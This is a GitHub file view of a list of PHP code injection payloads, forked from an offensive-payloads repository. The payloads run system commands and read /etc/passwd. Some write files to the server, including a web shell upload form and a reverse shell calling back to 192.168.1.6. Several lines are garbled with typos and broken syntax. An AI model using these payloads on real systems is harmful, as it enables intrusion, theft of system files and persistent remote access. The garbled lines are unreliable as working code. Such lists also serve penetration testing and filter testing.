forked from InfoSecWarrior/Offensive-Payloads
-
Notifications
You must be signed in to change notification settings - Fork 0
/
PHP-Code-Injections-Payloads.txt
64 lines (64 loc) · 2.24 KB
/
PHP-Code-Injections-Payloads.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
;id
'id'
;id;
&&id
echo 'id'
system('id')
;system('id')
system("id")
SYSTEM("id")
system(%27id%27)
system('id');phpinfo()
SYSTEM('id');PHPINFO()
;system('/usr/bin/id')
system('cat /etc/passwd');
;system('cat /etc/passwd')
shell exec("id")
SHELL EXEC("id")
exec("id")
EXEC("id")
exec("ping -c 4 192.168.1.6")
passthru("id")
PASSTHRU("id")
phpinfo()
phpinfo();id
PHPINFO()
PHPINFO();id
phpinfo();system('cat /etc/passwd')
phpinfo();system('id')
PHPINFO();SYSTEM('id')
print_r($_POST);system('id')
PRINT_R($_POST);SYSTEM('id')
pcntl_exec("/usr/bin/uptime")
readfile?"/etc/passwd")
file get contents ("/etc/passwd")
$file = fopen ("testl.txt", "w"); echo fwrite($file, "Hello World. Testing!"); fclose($file)
$file = fopen ("phpinfo-1.php", "W"); echo fwrite ($file, "<?php phpinfo(); ?>"); fclose ($file)
$file = fopen("pshell.php", "w"); echo fwrite($file, "php -r '$sock=fsockopen ('192.168.1.6' ,443) ;' /bin/sh -i <83 >83 2-83' ;"); fclose($file)
$file = fopen ("upload2.php", "w"); echo fwrite($file, '<html><form action="upload2.php" method="post" enctype="multipart/form-data">Select image to upload; <input type="file" name="fileToUpload" id="fileToUpload"><input type="submit" value="Upload" name="submit"></form></html><?php if( isset ($_POST["submit"])){ $file_name = $_FILES["fileToUpload"] ["name"]; $file_tmp_name = $FILES["fIleToUpload"("tmpname"]; if (move uploaded_file($file_tmp_ name, " ./" . $file_name)) { echo "ok"; } } ?>'); fclose($file)
passthru('id')
PASSTHRU('id')
;SYSTEM('id')
readfile("/etc/passwd");
readfile("index.html");
READFILE("index.html")
READFILE("/etc/passwd")
echo%20file_exists("index.html");
echo%20file_exists("/etc/passwd");
ECHO%20FILE_EXISTS("index.html");
ECHO%20FILE_EXISTS("/etc/passwd");
chmod("index.html",0777);
CHMOD("index.html",0777);
echo%20copy("/etc/passwd","/tmp/passwd");
echo%20file_exists("/tmp/passwd");
echo%20file_get_contents("/etc/passwd");
ECHO%20FILE_GET_CONTENTS("/etc/passwd");
echo%20file_put_contents("index.html","Hello%20World.%20Testing!");
ECHO%20FILE_PUT_CONTENTS("index.html","HELLO%20WORLD.%20TESTING!");
echo%20fileperms("index.html");
echo%20fileperms("/etc/passwd");
ECHO%20FILEPERMS("index.html");
ECHO%20FILEPERMS("/etc/passwd");
print_r(glob("*.txt"));
print_r(glob("*.html"));
print_r(glob("*.config"));